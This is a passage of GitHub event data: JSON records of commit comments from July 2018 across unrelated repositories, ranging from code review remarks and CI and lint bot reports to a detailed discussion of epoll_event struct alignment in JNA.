{"id":"7966058272","type":"CommitCommentEvent","actor":{"login":"Backurio"},"repo":{"name":"Backurio/Match3Replica"},"payload":{"comment":{"id":29709879,"position":null,"line":null,"path":null,"commit_id":"ec6d12737dbfe23f3dd7529a2782df37913f41d3","created_at":"2018-07-14T16:57:55Z","updated_at":"2018-07-14T16:57:55Z","author_association":"OWNER","body":"![](https://github.trello.services/images/mini-trello-icon.png) [weird behaviour when combining an ultimate with an object which has no other same types on the play area](https://trello.com/c/eYkeg0jw/50-weird-behaviour-when-combining-an-ultimate-with-an-object-which-has-no-other-same-types-on-the-play-area)"}},"created_at":"2018-07-14T16:57:55Z"}
{"id":"7966062454","type":"CommitCommentEvent","actor":{"login":"joaotavora"},"repo":{"name":"joaotavora/sly"},"payload":{"comment":{"id":29709889,"position":null,"line":null,"path":null,"commit_id":"ff1cd4187d801396db437f0c5e8bd15821416cf7","created_at":"2018-07-14T17:00:52Z","updated_at":"2018-07-14T17:00:52Z","author_association":"OWNER","body":"\"Cleanup trailing whitespace\" would be slightly more useful, otherwise OK."}},"created_at":"2018-07-14T17:00:52Z"}
{"id":"7966067119","type":"CommitCommentEvent","actor":{"login":"NEDCampDev"},"repo":{"name":"NEDCamp/nedcamp"},"payload":{"comment":{"id":29709898,"position":null,"line":null,"path":null,"commit_id":"54f3ce26bbaec8a1e808f3557eaa78794308163e","created_at":"2018-07-14T17:04:20Z","updated_at":"2018-07-14T17:04:20Z","author_association":"COLLABORATOR","body":"Created multidev environment [nedcamp#ci-131](https://dashboard.pantheon.io/sites/1e9ab33c-01d3-42bd-bb42-5008333172a3#ci-131).\n\n[![Visit Site](https://raw.githubusercontent.com/pantheon-systems/ci-drops-8/0.1.0/data/img/visit-site-36.png)](https://ci-131-nedcamp.pantheonsite.io/)"}},"created_at":"2018-07-14T17:04:20Z"}
{"id":"7966067745","type":"CommitCommentEvent","actor":{"login":"JoaoVFG"},"repo":{"name":"JoaoVFG/sysrlog"},"payload":{"comment":{"id":29709900,"position":null,"line":null,"path":null,"commit_id":"6433b3c3d849591bcc786ca99366c59a07b4785d","created_at":"2018-07-14T17:04:52Z","updated_at":"2018-07-14T17:04:52Z","author_association":"OWNER","body":"![](https://github.trello.services/images/mini-trello-icon.png) [Criar ChengeSet para Estado](https://trello.com/c/lxmB1DxQ/31-criar-chengeset-para-estado)"}},"created_at":"2018-07-14T17:04:52Z"}
{"id":"7966067794","type":"CommitCommentEvent","actor":{"login":"c4milo"},"repo":{"name":"hooklift/base-components"},"payload":{"comment":{"id":29709901,"position":null,"line":null,"path":null,"commit_id":"85e9edef12df08238dc21c8a9e9919af70e8248a","created_at":"2018-07-14T17:04:54Z","updated_at":"2018-07-14T17:04:54Z","author_association":"MEMBER","body":"snake-case is much more readable. What made you change your mind? 😬"}},"created_at":"2018-07-14T17:04:54Z"}
{"id":"7966068189","type":"CommitCommentEvent","actor":{"login":"JoaoVFG"},"repo":{"name":"JoaoVFG/sysrlog"},"payload":{"comment":{"id":29709902,"position":null,"line":null,"path":null,"commit_id":"90791ca0462eaf9ea39a2db1fc187d7e66fb6071","created_at":"2018-07-14T17:05:15Z","updated_at":"2018-07-14T17:05:15Z","author_association":"OWNER","body":"![](https://github.trello.services/images/mini-trello-icon.png) [Criar ChengeSet para Estado](https://trello.com/c/lxmB1DxQ/31-criar-chengeset-para-estado)"}},"created_at":"2018-07-14T17:05:15Z"}
{"id":"7966069866","type":"CommitCommentEvent","actor":{"login":"Phylogeny"},"repo":{"name":"MrCrayfish/MrCrayfishVehicleMod"},"payload":{"comment":{"id":29709905,"position":null,"line":null,"path":null,"commit_id":"59ff9a2b797ec043d727dd5bebb3ff35f6f6a546","created_at":"2018-07-14T17:06:36Z","updated_at":"2018-07-14T17:06:36Z","author_association":"NONE","body":"I just use eclipse. But I don't change much in the way of settings. I should, but I don't. But I should..."}},"created_at":"2018-07-14T17:06:36Z"}
{"id":"7966071857","type":"CommitCommentEvent","actor":{"login":"maicki"},"repo":{"name":"maicki/OrderedDictionary"},"payload":{"comment":{"id":29709914,"position":null,"line":null,"path":null,"commit_id":"f431034702c09e33176097db1fb9a1f85e61513f","created_at":"2018-07-14T17:08:09Z","updated_at":"2018-07-14T17:08:09Z","author_association":"OWNER","body":"@lukaskubanek Didn't update to 2.1.0 yet as I would have to copy and paste it in our [Swift example app](https://github.com/TextureGroup/Texture/tree/master/examples_extra/ASDKgram-Swift) within [Texture](https://github.com/TextureGroup/Texture).\r\n\r\nI see your point of not adding CocoaPods support in the README, but creating a custom PodSpec for us is too much effort for just a sample application. "}},"created_at":"2018-07-14T17:08:09Z"}
{"id":"7966073795","type":"CommitCommentEvent","actor":{"login":"NEDCampDev"},"repo":{"name":"NEDCamp/nedcamp"},"payload":{"comment":{"id":29709916,"position":null,"line":null,"path":null,"commit_id":"f923ea100b9c13324d596d17c3ce41950cd57425","created_at":"2018-07-14T17:09:48Z","updated_at":"2018-07-14T17:09:48Z","author_association":"COLLABORATOR","body":"Created multidev environment [nedcamp#ci-134](https://dashboard.pantheon.io/sites/1e9ab33c-01d3-42bd-bb42-5008333172a3#ci-134).\n\n[![Visit Site](https://raw.githubusercontent.com/pantheon-systems/ci-drops-8/0.1.0/data/img/visit-site-36.png)](https://ci-134-nedcamp.pantheonsite.io/)"}},"created_at":"2018-07-14T17:09:48Z"}
{"id":"7966074567","type":"CommitCommentEvent","actor":{"login":"FokinAlex"},"repo":{"name":"nikon-petr/simple-api"},"payload":{"comment":{"id":29709918,"position":189,"line":189,"path":"src/main/java/edu/nikon/simpleapi/api/user/domain/User.java","commit_id":"58c9bb9d66479336f093250f518a50e59c264a04","created_at":"2018-07-14T17:10:26Z","updated_at":"2018-07-14T17:10:26Z","author_association":"NONE","body":"Even worse :cry: "}},"created_at":"2018-07-14T17:10:26Z"}
{"id":"7966075206","type":"CommitCommentEvent","actor":{"login":"streamich"},"repo":{"name":"streamich/nano-css"},"payload":{"comment":{"id":29709919,"position":null,"line":null,"path":null,"commit_id":"c449a13c07105bc24fb270b3325f52571ba3a34c","created_at":"2018-07-14T17:10:55Z","updated_at":"2018-07-14T17:10:55Z","author_association":"OWNER","body":"Build version: __`2.1.0-feat-various.60`__ :crossed_fingers: [`feat-various`](https://github.com/streamich/nano-css/tree/feat-various) on [*CircleCI*](https://circleci.com/gh/streamich/nano-css/60) :tada:"}},"created_at":"2018-07-14T17:10:55Z"}
{"id":"7966075469","type":"CommitCommentEvent","actor":{"login":"streamich"},"repo":{"name":"streamich/nano-css"},"payload":{"comment":{"id":29709920,"position":null,"line":null,"path":null,"commit_id":"d6f0ad58d2bf5e0204e482abe4b9b16ca7d0bc49","created_at":"2018-07-14T17:11:07Z","updated_at":"2018-07-14T17:11:07Z","author_association":"OWNER","body":"Updated `safe` addon, pls see docs."}},"created_at":"2018-07-14T17:11:07Z"}
{"id":"7966076193","type":"CommitCommentEvent","actor":{"login":"pedropaulovc"},"repo":{"name":"pedropaulovc/fake-xrm-easy"},"payload":{"comment":{"id":29709922,"position":null,"line":null,"path":null,"commit_id":"ddefd1c1f83b0f01defa9e61eda2672d43083ae8","created_at":"2018-07-14T17:11:40Z","updated_at":"2018-07-14T17:11:40Z","author_association":"OWNER","body":"Hey @jordimontana82 sorry it took me so long to reply, I didn't get a notification from GitHub. I'm definitely trying to fix this multi select optionset gap in FakeXrm Easy. I just got caught up with other tasks and couldn't finish my work on it. The code is still far from ready for a pull request (the major gap is around building LINQ expressions for multiselect queries). I'm glad to know that you're interested in it, hopefully it will be ready soon! Cheers"}},"created_at":"2018-07-14T17:11:40Z"}
{"id":"7966077405","type":"CommitCommentEvent","actor":{"login":"TrungNguyen140297"},"repo":{"name":"TrungNguyen140297/Test"},"payload":{"comment":{"id":29709924,"position":6,"line":4,"path":"Test1/Reading...txt","commit_id":"428ffcec571ab0a6973419069b79046697fd2ba6","created_at":"2018-07-14T17:12:34Z","updated_at":"2018-07-14T17:12:34Z","author_association":"OWNER","body":"dmdmdmdmm"}},"created_at":"2018-07-14T17:12:34Z"}
{"id":"7966077896","type":"CommitCommentEvent","actor":{"login":"streamich"},"repo":{"name":"streamich/nano-css"},"payload":{"comment":{"id":29709925,"position":null,"line":null,"path":null,"commit_id":"d6f0ad58d2bf5e0204e482abe4b9b16ca7d0bc49","created_at":"2018-07-14T17:12:58Z","updated_at":"2018-07-14T17:12:58Z","author_association":"OWNER","body":"@steadicat ^^"}},"created_at":"2018-07-14T17:12:58Z"}
{"id":"7966078356","type":"CommitCommentEvent","actor":{"login":"streamich"},"repo":{"name":"streamich/nano-css"},"payload":{"comment":{"id":29709926,"position":null,"line":null,"path":null,"commit_id":"53656ec7e27e7327bfe3cbe763d3f465642a2f48","created_at":"2018-07-14T17:13:16Z","updated_at":"2018-07-14T17:13:16Z","author_association":"OWNER","body":"Build version: __`2.1.0-master.61`__ :crossed_fingers: [`master`](https://github.com/streamich/nano-css/tree/master) on [*CircleCI*](https://circleci.com/gh/streamich/nano-css/61) :tada:"}},"created_at":"2018-07-14T17:13:16Z"}
{"id":"7966078535","type":"CommitCommentEvent","actor":{"login":"lex111"},"repo":{"name":"the-road-to-learn-react/the-road-to-learn-react"},"payload":{"comment":{"id":29709927,"position":null,"line":null,"path":null,"commit_id":"0873e5ade760a7f561a3b813d4a3447724aff0e3","created_at":"2018-07-14T17:13:26Z","updated_at":"2018-07-14T17:13:26Z","author_association":"CONTRIBUTOR","body":"👍 "}},"created_at":"2018-07-14T17:13:26Z"}
{"id":"7966079248","type":"CommitCommentEvent","actor":{"login":"lintr-bot"},"repo":{"name":"ropensci/drake"},"payload":{"comment":{"id":29709928,"position":null,"line":null,"path":null,"commit_id":"4505441bb756c485203aa2bd450476115102eb8a","created_at":"2018-07-14T17:13:58Z","updated_at":"2018-07-14T17:13:58Z","author_association":"NONE","body":"[tests/testthat/test-triggers.R:21:1:](https://github.com/ropensci/drake/blob/4505441bb756c485203aa2bd450476115102eb8a/tests/testthat/test-triggers.R#L21) *style:* **Trailing whitespace is superfluous.**\n```r\n​  \n^~\n```"}},"created_at":"2018-07-14T17:13:58Z"}
{"id":"7966081432","type":"CommitCommentEvent","actor":{"login":"kjm015"},"repo":{"name":"kjm015/Kyle-Newer"},"payload":{"comment":{"id":29709933,"position":14,"line":14,"path":"src/main/java/io/github/kjm015/kylenewer/commands/MathCommand.java","commit_id":"2f28b24f1dd9aac13c698acaf0fc44f314539262","created_at":"2018-07-14T17:15:33Z","updated_at":"2018-07-14T17:15:33Z","author_association":"OWNER","body":"what is this for?"}},"created_at":"2018-07-14T17:15:33Z"}
{"id":"7966082285","type":"CommitCommentEvent","actor":{"login":"GirishSarbhukan"},"repo":{"name":"maxmantz/redux-oidc-example"},"payload":{"comment":{"id":29709934,"position":null,"line":null,"path":null,"commit_id":"144c890a1296efb9f25b2613b61e89c3eeb5f601","created_at":"2018-07-14T17:16:10Z","updated_at":"2018-07-14T17:16:10Z","author_association":"NONE","body":"How to get client id parameter value in redux-oidc-example/src/utils/userManager.js\r\n\r\nSeems like i want this values to come from some rest end point.\r\n\r\nCould you please suggest?"}},"created_at":"2018-07-14T17:16:10Z"}
{"id":"7966083638","type":"CommitCommentEvent","actor":{"login":"SergeyAlekseyuk"},"repo":{"name":"SergeyAlekseyuk/python_homework"},"payload":{"comment":{"id":29709935,"position":3,"line":3,"path":"homework_1__6.py","commit_id":"c966986ecbe4b00ae460a82cc527ecf0d4cedf66","created_at":"2018-07-14T17:17:12Z","updated_at":"2018-07-14T17:17:12Z","author_association":"OWNER","body":"-"}},"created_at":"2018-07-14T17:17:12Z"}
{"id":"7966085166","type":"CommitCommentEvent","actor":{"login":"reuixiy"},"repo":{"name":"theme-next/hexo-theme-next"},"payload":{"comment":{"id":29709936,"position":null,"line":null,"path":null,"commit_id":"7d17575f01c94188cff7e5caaa122fc0384ffac9","created_at":"2018-07-14T17:18:30Z","updated_at":"2018-07-14T17:18:30Z","author_association":"NONE","body":"My blog has been used. :smile: \r\nThank you for your awesome contributions! :+1: "}},"created_at":"2018-07-14T17:18:30Z"}
{"id":"7966085788","type":"CommitCommentEvent","actor":{"login":"micahu"},"repo":{"name":"micahu/splitter"},"payload":{"comment":{"id":29709938,"position":null,"line":null,"path":null,"commit_id":"f7a5fdf459524a1c2539ad2552af36b50cf11f9e","created_at":"2018-07-14T17:19:02Z","updated_at":"2018-07-14T17:19:02Z","author_association":"OWNER","body":"@rob-Hitchens - I've made a few more commits to add ```withdrawal()``` method and address other feedback"}},"created_at":"2018-07-14T17:19:02Z"}
{"id":"7966085882","type":"CommitCommentEvent","actor":{"login":"gil--"},"repo":{"name":"topmonks/shopify-express"},"payload":{"comment":{"id":29709939,"position":null,"line":null,"path":null,"commit_id":"d88ca147fec485e0fd42e832a53788513b5b34ea","created_at":"2018-07-14T17:19:07Z","updated_at":"2018-07-14T17:19:07Z","author_association":"NONE","body":"nice!"}},"created_at":"2018-07-14T17:19:07Z"}
{"id":"7966087245","type":"CommitCommentEvent","actor":{"login":"steadicat"},"repo":{"name":"streamich/nano-css"},"payload":{"comment":{"id":29709940,"position":null,"line":null,"path":null,"commit_id":"d6f0ad58d2bf5e0204e482abe4b9b16ca7d0bc49","created_at":"2018-07-14T17:20:16Z","updated_at":"2018-07-14T17:20:16Z","author_association":"NONE","body":"Thanks!\r\n\r\nBTW I’m curious what the performance impact of `safe` is. Have you done some tests?"}},"created_at":"2018-07-14T17:20:16Z"}
{"id":"7966087831","type":"CommitCommentEvent","actor":{"login":"mllyx"},"repo":{"name":"TetraSource/PowerConverters"},"payload":{"comment":{"id":29709941,"position":null,"line":null,"path":null,"commit_id":"0020783fdfeb03ec35201694893b007a1d718af1","created_at":"2018-07-14T17:20:42Z","updated_at":"2018-07-14T17:20:42Z","author_association":"NONE","body":"Excellent! I'm watching this bug too. Did you have a build? Or can you make a pull request to @portablejim build a new version?"}},"created_at":"2018-07-14T17:20:42Z"}
{"id":"7966102793","type":"CommitCommentEvent","actor":{"login":"bturner"},"repo":{"name":"brettwooldridge/NuProcess"},"payload":{"comment":{"id":29709958,"position":43,"line":49,"path":"src/main/java/com/zaxxer/nuprocess/linux/EpollEvent.java","commit_id":"4989a9edc2a8f0dbed19bc03b9dfaa6a0963067d","created_at":"2018-07-14T17:32:32Z","updated_at":"2018-07-14T17:32:32Z","author_association":"CONTRIBUTOR","body":"While I was trying to reduce the JNA overhead, I experimented with updating `ProcessEpoll` to pass in a buffer large enough to receive several events at once. Especially for larger instances, Bitbucket Server can have 100+ `git` processes running at once, and especially for hosting processes they tend to always have output available, so at each polling there are likely to be many processes waiting. Under that load, passing a larger array substantially reduces the number of native calls. I ended up reverting that part of the change to keep my overall change smaller, and because, while it did reduce the number of native calls, it didn't \"move the needle\" very much on JNA overhead.\r\n\r\nWhen passing an array of events, with `ALIGN_GNUC` I found that only the first event would ever have its `fd` set, even though the `epoll_wait` would return >1. After some extensive debugging, and writing a C test program, I concluded it happened because `ALIGN_GNUC` results in each event being 16 bytes where the underlying OS only uses 12 bytes. As I documented, `struct_epoll` is defined with `__attribute__ __packed__` on x86-64, so it's not 8-byte-aligned at the OS level; it's 4-byte-aligned.\r\n\r\nHere's my simple check:\r\n```c\r\n#include <stdio.h>\r\n#include <linux/eventpoll.h>\r\n\r\nint main(int argc, char *argv[]) {\r\n\tprintf(\"sizeof(epoll_event) = %ld\\n\", sizeof(struct epoll_event));\r\n\r\n\treturn 0;\r\n}\r\n```\r\n\r\nRunning that on my system shows:\r\n```\r\nbturner@auvry:~$ uname -a\r\nLinux auvry 4.15.0-20-generic #21-Ubuntu SMP Tue Apr 24 06:16:15 UTC 2018 x86_64 x86_64 x86_64 GNU/Linux\r\nbturner@auvry:~$ file a.out\r\na.out: ELF 64-bit LSB shared object, x86-64, version 1 (SYSV), dynamically linked, interpreter /lib64/ld-linux-x86-64.so.2, for GNU/Linux 3.2.0, BuildID[sha1]=40a6f0bfb5eb1904c2c7951faa2068b87b6680cd, not stripped\r\nbturner@auvry:~$ ./a.out\r\nsizeof(epoll_event) = 12\r\n```\r\n\r\n`eventpoll.h` has the `struct` defined like this:\r\n\r\n```c\r\n/* \r\n * On x86-64 make the 64bit structure have the same alignment as the\r\n * 32bit structure. This makes 32bit emulation easier.\r\n *\r\n * UML/x86_64 needs the same packing as x86_64\r\n */\r\n#ifdef __x86_64__\r\n#define EPOLL_PACKED __attribute__((packed))\r\n#else\r\n#define EPOLL_PACKED\r\n#endif\r\n\r\nstruct epoll_event {\r\n        __u32 events;\r\n        __u64 data;\r\n} EPOLL_PACKED;\r\n```\r\n\r\nAligning at 8 bytes on x86-64 doesn't _seem_ like something `GNUC` should do here, based on the Javadocs for it in JNA:\r\n\r\n```java\r\n    /** validated for 32-bit x86 linux/gcc; align field size, max 4 bytes */\r\n    public static final int ALIGN_GNUC = 2;\r\n```\r\n\r\nRegardless of how I, at least, read that documentation, it pads the structure out from 12 bytes to 16. If you flip this to `GNUC`, you'll see `EpollEventTest` fail because the size of the structure will change.\r\n\r\nSince I reverted the change to poll for multiple events per call you can likely revert this alignment change and I guess it would be \"fine\", like it was before I made the change. The reason I didn't do so is because the resulting alignment is _wrong_, based on everything I can see, even if it \"doesn't matter\" that it's wrong because only a single event is read.\r\n\r\nIs it possible the \"reported alignment issues\" are a misunderstanding? `epoll_event` _is not aligned_ on x86-64, so accesses to it must be unaligned."}},"created_at":"2018-07-14T17:32:32Z"}
{"id":"7966103264","type":"CommitCommentEvent","actor":{"login":"Traesh"},"repo":{"name":"AshamaneProject/AshamaneCore"},"payload":{"comment":{"id":29709960,"position":null,"line":null,"path":null,"commit_id":"a2124a3f80a01ff0b53c28eb80ebe23814ac7003","created_at":"2018-07-14T17:32:54Z","updated_at":"2018-07-14T17:32:54Z","author_association":"NONE","body":"❤️ "}},"created_at":"2018-07-14T17:32:54Z"}
{"id":"7966103741","type":"CommitCommentEvent","actor":{"login":"samerton"},"repo":{"name":"NamelessMC/Nameless"},"payload":{"comment":{"id":29709961,"position":null,"line":null,"path":null,"commit_id":"de8a8c52099f729be9a774d1c2b8b775ff97e9dd","created_at":"2018-07-14T17:33:21Z","updated_at":"2018-07-14T17:33:21Z","author_association":"MEMBER","body":"@baxandrei The fact that you don't have an alert showing (even an empty one without text) suggests the template hasn't been updated, can you ensure you have done this?"}},"created_at":"2018-07-14T17:33:21Z"}
{"id":"7966104474","type":"CommitCommentEvent","actor":{"login":"frap130"},"repo":{"name":"SugaMod/op6_kernel"},"payload":{"comment":{"id":29709962,"position":null,"line":null,"path":null,"commit_id":"b4daa6be4d0c0c6554037a1294ffb3a902ced3b8","created_at":"2018-07-14T17:33:59Z","updated_at":"2018-07-14T17:33:59Z","author_association":"NONE","body":"Weird fix 🤨😂"}},"created_at":"2018-07-14T17:33:59Z"}
{"id":"7966107482","type":"CommitCommentEvent","actor":{"login":"nrel-bot"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":29709970,"position":null,"line":null,"path":null,"commit_id":"3d9f8454ba627505f373db5b6f6ab1ae283a5187","created_at":"2018-07-14T17:36:17Z","updated_at":"2018-07-14T17:36:17Z","author_association":"NONE","body":"issue-6829 (EnergyArchmage) - Win64-Windows-7-VisualStudio-14: OK (2779 of 2940 tests passed, 13 test warnings)\n\nMessages:\n\n * 14 tests had: AUD diffs.\n * 131 tests had: EIO diffs.\n * 96 tests had: ESO big diffs.\n * 160 tests had: Table big diffs.\n * 23 tests had: ERR diffs.\n * 58 tests had: MTR big diffs.\n * 21 tests had: ESO small diffs.\n * 17 tests had: MTR small diffs.\n\nFailures:\n\n\nregression Test Summary\n * Passed: 462\n * Failed: 161\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-3d9f8454ba627505f373db5b6f6ab1ae283a5187-Win64-Windows-7-VisualStudio-14.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.png)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-3d9f8454ba627505f373db5b6f6ab1ae283a5187-Win64-Windows-7-VisualStudio-14.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-94.52%25-yellow.png)</a> \n"}},"created_at":"2018-07-14T17:36:17Z"}
{"id":"7966109366","type":"CommitCommentEvent","actor":{"login":"nrel-bot-2"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":29709973,"position":null,"line":null,"path":null,"commit_id":"d4be3ff9e8ae2b8b28bc729f5fd8fc97afcb8f8b","created_at":"2018-07-14T17:37:46Z","updated_at":"2018-07-14T17:37:46Z","author_association":"NONE","body":"develop (Myoldmopar) - x86_64-Linux-Ubuntu-14.04-gcc-4.8-IntegrationCoverage-Debug: OK (2320 of 2320 tests passed, 0 test warnings)\n\n\n\n\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-d4be3ff9e8ae2b8b28bc729f5fd8fc97afcb8f8b-x86_64-Linux-Ubuntu-14.04-gcc-4.8-IntegrationCoverage-Debug.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.png)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-d4be3ff9e8ae2b8b28bc729f5fd8fc97afcb8f8b-x86_64-Linux-Ubuntu-14.04-gcc-4.8-IntegrationCoverage-Debug.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-100.0%25-green.png)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-d4be3ff9e8ae2b8b28bc729f5fd8fc97afcb8f8b-x86_64-Linux-Ubuntu-14.04-gcc-4.8-IntegrationCoverage-Debug.html'>![Coverage Badge](http://img.shields.io/badge/coverage%20status-71.21%25-green.png)</a>\n"}},"created_at":"2018-07-14T17:37:46Z"}
{"id":"7966110519","type":"CommitCommentEvent","actor":{"login":"TreeAntSan"},"repo":{"name":"TreeAntSan/puruselenium"},"payload":{"comment":{"id":29709976,"position":null,"line":null,"path":null,"commit_id":"37356bbf4964bbf391786c81350575af8dca97ee","created_at":"2018-07-14T17:38:45Z","updated_at":"2018-07-14T17:38:45Z","author_association":"OWNER","body":"**This was not committed by the user kinke**, who appears to be a real engineer who works in D language (which I didn't even knew existed), so the idea that he made a single commit to a shoddy-ass python hack project designed to rip Japanese comic porn from a website is ridiculous.\r\n\r\nLet me explain why this looks this way:\r\nThis git repo started out as only a local repo. This account, TreeAntSan, is an alternative account for me and only when my primary account (with my real name attached to it) started having a reason to use GitHub a lot did I decide to look into hosting this project on GitHub. So all the commits I made with made-up users and email addresses, when uploaded to Github, suddenly had meaning.\r\n\r\nAll commits from init 2014-06-12 to 2014-06-22 were made with \"John Doe\" with the email \"johndoe@example.com\", then I switched to the email \"johnd@debian.WORKGROUP\" from 2014-09-21 to 2015-04-20, the full user name of the anonymous John Doe account I made for a debian VM I was developing on.\r\n\r\nThen, must've been because I had to recreate a new debian VM and reset my git settings, I updated the user to \"No One\" with the email \"noone@nowhere.com\" for this one commit on 2015-08-29, which, apparently, is the email address used by the user kinke.\r\n\r\nAfter that I started using my email address and committing under this account, so GitHub got it right after that."}},"created_at":"2018-07-14T17:38:45Z"}
{"id":"7966110962","type":"CommitCommentEvent","actor":{"login":"AtlAntA118"},"repo":{"name":"nicehash/NiceHashMinerLegacy"},"payload":{"comment":{"id":29709977,"position":null,"line":null,"path":null,"commit_id":"dac335b73b08d72c000919bd2bafe6b6b25aa6a3","created_at":"2018-07-14T17:39:07Z","updated_at":"2018-07-14T17:39:07Z","author_association":"NONE","body":"GJ man. Adding the pill to the miner will make a lot of people happy."}},"created_at":"2018-07-14T17:39:07Z"}
{"id":"7966111182","type":"CommitCommentEvent","actor":{"login":"nrel-bot-2"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":29709979,"position":null,"line":null,"path":null,"commit_id":"d4be3ff9e8ae2b8b28bc729f5fd8fc97afcb8f8b","created_at":"2018-07-14T17:39:17Z","updated_at":"2018-07-14T17:39:17Z","author_association":"NONE","body":"develop (Myoldmopar) - x86_64-Linux-Ubuntu-14.04-custom_check: OK (0 of 0 tests passed, 0 test warnings)\n\n\n\n\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-d4be3ff9e8ae2b8b28bc729f5fd8fc97afcb8f8b-x86_64-Linux-Ubuntu-14.04-custom_check.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.png)</a>  \n"}},"created_at":"2018-07-14T17:39:17Z"}
{"id":"7966113235","type":"CommitCommentEvent","actor":{"login":"AussieGlenn"},"repo":{"name":"AshamaneProject/AshamaneCore"},"payload":{"comment":{"id":29709984,"position":null,"line":null,"path":null,"commit_id":"a2124a3f80a01ff0b53c28eb80ebe23814ac7003","created_at":"2018-07-14T17:40:44Z","updated_at":"2018-07-14T17:40:44Z","author_association":"NONE","body":"This is really helpful"}},"created_at":"2018-07-14T17:40:44Z"}
{"id":"7966113631","type":"CommitCommentEvent","actor":{"login":"lintr-bot"},"repo":{"name":"ropensci/drake"},"payload":{"comment":{"id":29709986,"position":null,"line":null,"path":null,"commit_id":"90897b46a9c40db77d3339aeebc1ba5e3edf266a","created_at":"2018-07-14T17:41:02Z","updated_at":"2018-07-14T17:41:02Z","author_association":"NONE","body":"[tests/testthat/test-intermediate-file.R:27:1:](https://github.com/ropensci/drake/blob/90897b46a9c40db77d3339aeebc1ba5e3edf266a/tests/testthat/test-intermediate-file.R#L27) *style:* **Trailing whitespace is superfluous.**\n```r\n​  \n^~\n```\n[tests/testthat/test-intermediate-file.R:46:1:](https://github.com/ropensci/drake/blob/90897b46a9c40db77d3339aeebc1ba5e3edf266a/tests/testthat/test-intermediate-file.R#L46) *style:* **Trailing whitespace is superfluous.**\n```r\n​  \n^~\n```"}},"created_at":"2018-07-14T17:41:02Z"}
{"id":"7966113830","type":"CommitCommentEvent","actor":{"login":"pquan"},"repo":{"name":"cryptomator/cryptomator-linux"},"payload":{"comment":{"id":29709987,"position":null,"line":null,"path":null,"commit_id":"5c795216eec38675fe94b7e6bf4a9e88b26deec9","created_at":"2018-07-14T17:41:10Z","updated_at":"2018-07-14T17:41:10Z","author_association":"NONE","body":"make life easier when working on the repository"}},"created_at":"2018-07-14T17:41:10Z"}
{"id":"7966120875","type":"CommitCommentEvent","actor":{"login":"aomalov"},"repo":{"name":"sunny14/Euler"},"payload":{"comment":{"id":29709997,"position":12,"line":12,"path":"src/main/java/src/main/java/com.faina.test/euler12/DivisorsCalculator.java","commit_id":"163136b2f166ea8b628a3cc574ab3b58098821e6","created_at":"2018-07-14T17:46:46Z","updated_at":"2018-07-14T17:46:46Z","author_association":"NONE","body":"Actually - int gives more than 2bln in positive numbers - should be more than enough\r\nIn case you are not playing with boxing and complex objects"}},"created_at":"2018-07-14T17:46:46Z"}
{"id":"7966121009","type":"CommitCommentEvent","actor":{"login":"tusharmore66"},"repo":{"name":"tusharmore66/hello-world"},"payload":{"comment":{"id":29709998,"position":null,"line":null,"path":null,"commit_id":"3baa8451271e11294c5f37af75c72d7dab4b5cea","created_at":"2018-07-14T17:46:54Z","updated_at":"2018-07-14T17:46:54Z","author_association":"OWNER","body":"wow seamless integration from Microsoft Teams"}},"created_at":"2018-07-14T17:46:54Z"}
{"id":"7966124383","type":"CommitCommentEvent","actor":{"login":"aomalov"},"repo":{"name":"sunny14/Euler"},"payload":{"comment":{"id":29710004,"position":22,"line":22,"path":"src/main/java/src/main/java/com.faina.test/utils/DivisorUtils.java","commit_id":"163136b2f166ea8b628a3cc574ab3b58098821e6","created_at":"2018-07-14T17:49:41Z","updated_at":"2018-07-14T17:49:41Z","author_association":"NONE","body":"equals might be more natural"}},"created_at":"2018-07-14T17:49:41Z"}
{"id":"7966125406","type":"CommitCommentEvent","actor":{"login":"philsupertramp"},"repo":{"name":"JDAPweb/WA-project"},"payload":{"comment":{"id":29710005,"position":null,"line":null,"path":null,"commit_id":"f143a654f1ee90dd4fe2e82ad87b2f49ba5893a7","created_at":"2018-07-14T17:50:27Z","updated_at":"2018-07-14T17:50:27Z","author_association":"COLLABORATOR","body":"[in](https://github.com/JDAPweb/WA-project/commit/f143a654f1ee90dd4fe2e82ad87b2f49ba5893a7#diff-156442e2c6fff52b6aefa29087c136cdR262) fehlt noch ein `<div class=\"col-12\">` und am Ende `</div>`\r\n\r\nalso komplett:\r\n```\r\n<div class=\"col-12\">\r\n    <!-- möglichkeit eigene antwort abzugeben, falls angemeldet: -->\r\n    <div class=\"row text-center border rounded\">\r\n    \r\n        <!-- nutzerkrams -->\r\n        <div class=\"col-2 border\">\r\n            <table class=\"nutzerkrams\">\r\n                <tr>\r\n                    <td>\r\n                        <img src=\"EmptyUser.png\" height=\"50\">\r\n                    </td>\r\n                    <td>\r\n                        <table class=\"nutzerTable\">\r\n                            <tr>\r\n                                <td><span>\r\n                                    Nutzername\r\n                                </span></td>\r\n                            </tr>\r\n                            <tr>\r\n                                <td><span>\r\n                                    918\r\n                                </span></td>\r\n                            </tr>\r\n                        </table>\r\n                    </td>\r\n                </tr>\r\n            </table>\r\n    \r\n            <!-- wertungs buttons-->\r\n            <table class=\"frageTable border\">\r\n                <tr>\r\n                    <td><span>42</span></td>\r\n                    <td><span>▲</span></td>\r\n                </tr>\r\n                <tr>\r\n                    <td><span>29</span></td>\r\n                    <td><span>&#8226;</span></td>\r\n                </tr>\r\n                <tr>\r\n                    <td><span>-13</span></td>\r\n                    <td><span>▼</span></td>\r\n                </tr>\r\n            </table>\r\n        </div>\r\n        <!-- Antwort text -->\r\n        <div class=\"col-10 border text-left\">\r\n            <div style=\"margin-right:1000px;\">\r\n                <!--\tsehr seltsam, irgendwas muss hier drin sein, damit das form da drunter die richtige breite abbekommt, das verstehe ich nicht! -->\r\n            </div>\r\n            <form >\r\n                <div class=\"form-group row\">\r\n                    <label 